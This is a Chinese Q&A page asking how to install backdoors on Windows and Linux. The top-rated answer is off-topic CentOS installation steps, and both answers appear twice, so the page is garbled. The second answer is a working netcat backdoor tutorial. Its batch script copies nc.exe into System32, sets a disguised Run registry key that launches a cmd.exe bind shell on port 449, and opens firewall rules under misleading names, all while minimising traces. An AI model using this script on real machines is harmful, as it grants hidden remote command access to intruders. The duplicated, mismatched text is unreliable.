如何在Windows,Linux中安装后门
答案:2 悬赏:0 手机版
解决时间 2021-03-24 22:17
- 提问者网友:绫月
- 2021-03-24 17:15
如何在Windows,Linux中安装后门
最佳答案
- 五星知识达人网友:街头电车
- 2021-03-24 17:58
在Windows7系统下安装Linux方法,下面以Centos版本的Linux系统安装为例,下面是步骤:1、首先,插入一张CentOS 6.4的安装介质(光盘或者刻录的U盘),使用介质启动电脑出现如下界面。
Install or upgrade an existing system 安装或升级现有的系统
install system with basic video driver 安装过程中采用基本的显卡驱动
Rescue installed system 进入系统修复模式
Boot from local drive 退出安装从硬盘启动
Memory test 内存检测
2、这一步检查系统镜像是否有错误,时间较长,不想等待;直接“skip”就可以了。
3、出现引导界面,点击“next”。
4、选中“English(English)”否则会有部分乱码问题。
5、键盘布局选择“U.S.English”。
6、选择“Basic Storage Devies"点击"Next"。
7、询问是否忽略所有数据,新电脑安装系统选择"Yes,discard any data"。
8、Hostname填写格式“英文名.姓”。
9、网络设置安装图示顺序点击就可以了。
10、时区可以在地图上点击,选择“shanghai”并取消System clock uses UTC前面的对勾。
11、设置root的密码。
12、硬盘分区,一定要按照图示点选。
13、调整分区,必须要有/home这个分区,如果没有这个分区,安装部分软件会出现不能安装的问题。
14、询问是否格式化分区,选择Format格式化即可。
15、将更改写入到硬盘。
16、引导程序安装位置。
17、最重要的一步,也是最关键的一步,按图示顺序点击即可。
18、至此,一个最精简Centos系统的桌面环境就设置完成了,然后系统开始自动安装。
19、安装完成后,重启系统进入登陆界面,输入用户名密码登陆即可。
Install or upgrade an existing system 安装或升级现有的系统
install system with basic video driver 安装过程中采用基本的显卡驱动
Rescue installed system 进入系统修复模式
Boot from local drive 退出安装从硬盘启动
Memory test 内存检测
2、这一步检查系统镜像是否有错误,时间较长,不想等待;直接“skip”就可以了。
3、出现引导界面,点击“next”。
4、选中“English(English)”否则会有部分乱码问题。
5、键盘布局选择“U.S.English”。
6、选择“Basic Storage Devies"点击"Next"。
7、询问是否忽略所有数据,新电脑安装系统选择"Yes,discard any data"。
8、Hostname填写格式“英文名.姓”。
9、网络设置安装图示顺序点击就可以了。
10、时区可以在地图上点击,选择“shanghai”并取消System clock uses UTC前面的对勾。
11、设置root的密码。
12、硬盘分区,一定要按照图示点选。
13、调整分区,必须要有/home这个分区,如果没有这个分区,安装部分软件会出现不能安装的问题。
14、询问是否格式化分区,选择Format格式化即可。
15、将更改写入到硬盘。
16、引导程序安装位置。
17、最重要的一步,也是最关键的一步,按图示顺序点击即可。
18、至此,一个最精简Centos系统的桌面环境就设置完成了,然后系统开始自动安装。
19、安装完成后,重启系统进入登陆界面,输入用户名密码登陆即可。
全部回答
- 1楼网友:雪起风沙痕
- 2021-03-24 19:20
准备工作
假设用户以管理员权限登录系统,在Windows 7系统上使用netcat 创建一个后门。
Netcat 功能比较单一, 缺少了许多我们渗透工作中需要的功能。为此我们将创建一个便携式的工具包来解决这个问题 :
1.下载额外的文件和附加持续.
2.编辑修改指定文件.
3.快速创建执行后门.
4.控制远程服务器并进行恶作剧 :)
为了便于你第一时间获取到你的工具包,你需要将它放置在一个独立的U盘或者在线服务器上。
便携式工具(Portable Applications)
便携式工具是那些不需要安装就能直接使用的程序,它们往往将所有的执行环境和核心程序本身一同打包成一个独立的文件,方便携带。在独立文件执行的过程中会自行释放额的需求文件,并构建一个可顺利执行目标程序的环境。
1.不依赖特定的dll(dll已经打包)
2.不依赖注册表设置(有可能自行初始化) ,不遗留下任何注册表操作痕迹
3.操作痕迹最小化,尽量避免一切不必要的操作,导致留下过多的系统操作记录
创建 Windows 7 工具集
gVim (跨平台的文本编辑器, 提供强大的命令行操作交互)
Wget (下载 windows 64 位版本)
Netcat
有Kali系统的可以用命令 “find / -name nc.exe”搜索到 http://www.kali.org/ 或者下载已经编译好的版本 http://joncraton.org/blog/46/netcat-for-windows/
0×01初试 Netcat 后门
nc.exe -dLp 449 -e cmd.exe -L 这个选项会开启一个监听服务并等待客户端连接, 在客户端连接成功之后,会提供相应的交互服务。
– p 指定程序监听的端口(非管理员权限只能设置高于1024的端口. 同时不可复用现有端口)
– e 在接收到一个客户端连接后, 会执行一个特定的程序(这里是cmd.exe), 这个程序负责接下来的会话交互(执行客户端后期提交的任何命令)
– d 采取静默监听模式,避免nc运行过程中,产生过多额外的日志信息
Windows 7 后门安装批处理脚本
@echo off
Rem 拷贝文件到系统目录
xcopy "%systemdrive%\%username%\Desktop\nc.exe" "C:
\Windows\System32\" -y
Rem 修改注册表,增加后门自启动代码.
reg add "HKLM\software\microsoft\windows\currentversion\run" /f /v "system" /t
REG_SZ /d "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"
Rem 添加防火墙规则,开放监听的449端口,允许外部连接.
netsh advfirewall firewall add rule name="Rule 34" dir=in action=allow
protocol=UDP localport=449
netsh advfirewall firewall add rule name="Rule 35" dir=in action=allow
protocol=TCP localport=449
Rem 添加防火墙规则,允许nc.exe对外提供连接.
netsh advfirewall firewall add rule name="Allow Messenger" dir=in action=allow
program="C:\windows\system32\nc.exe"
假设用户以管理员权限登录系统,在Windows 7系统上使用netcat 创建一个后门。
Netcat 功能比较单一, 缺少了许多我们渗透工作中需要的功能。为此我们将创建一个便携式的工具包来解决这个问题 :
1.下载额外的文件和附加持续.
2.编辑修改指定文件.
3.快速创建执行后门.
4.控制远程服务器并进行恶作剧 :)
为了便于你第一时间获取到你的工具包,你需要将它放置在一个独立的U盘或者在线服务器上。
便携式工具(Portable Applications)
便携式工具是那些不需要安装就能直接使用的程序,它们往往将所有的执行环境和核心程序本身一同打包成一个独立的文件,方便携带。在独立文件执行的过程中会自行释放额的需求文件,并构建一个可顺利执行目标程序的环境。
1.不依赖特定的dll(dll已经打包)
2.不依赖注册表设置(有可能自行初始化) ,不遗留下任何注册表操作痕迹
3.操作痕迹最小化,尽量避免一切不必要的操作,导致留下过多的系统操作记录
创建 Windows 7 工具集
gVim (跨平台的文本编辑器, 提供强大的命令行操作交互)
Wget (下载 windows 64 位版本)
Netcat
有Kali系统的可以用命令 “find / -name nc.exe”搜索到 http://www.kali.org/ 或者下载已经编译好的版本 http://joncraton.org/blog/46/netcat-for-windows/
0×01初试 Netcat 后门
nc.exe -dLp 449 -e cmd.exe -L 这个选项会开启一个监听服务并等待客户端连接, 在客户端连接成功之后,会提供相应的交互服务。
– p 指定程序监听的端口(非管理员权限只能设置高于1024的端口. 同时不可复用现有端口)
– e 在接收到一个客户端连接后, 会执行一个特定的程序(这里是cmd.exe), 这个程序负责接下来的会话交互(执行客户端后期提交的任何命令)
– d 采取静默监听模式,避免nc运行过程中,产生过多额外的日志信息
Windows 7 后门安装批处理脚本
@echo off
Rem 拷贝文件到系统目录
xcopy "%systemdrive%\%username%\Desktop\nc.exe" "C:
\Windows\System32\" -y
Rem 修改注册表,增加后门自启动代码.
reg add "HKLM\software\microsoft\windows\currentversion\run" /f /v "system" /t
REG_SZ /d "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"
Rem 添加防火墙规则,开放监听的449端口,允许外部连接.
netsh advfirewall firewall add rule name="Rule 34" dir=in action=allow
protocol=UDP localport=449
netsh advfirewall firewall add rule name="Rule 35" dir=in action=allow
protocol=TCP localport=449
Rem 添加防火墙规则,允许nc.exe对外提供连接.
netsh advfirewall firewall add rule name="Allow Messenger" dir=in action=allow
program="C:\windows\system32\nc.exe"
我要举报
如以上回答内容为低俗、色情、不良、暴力、侵权、涉及违法等信息,可以点下面链接进行举报!
点此我要举报以上问答信息
大家都在看
推荐资讯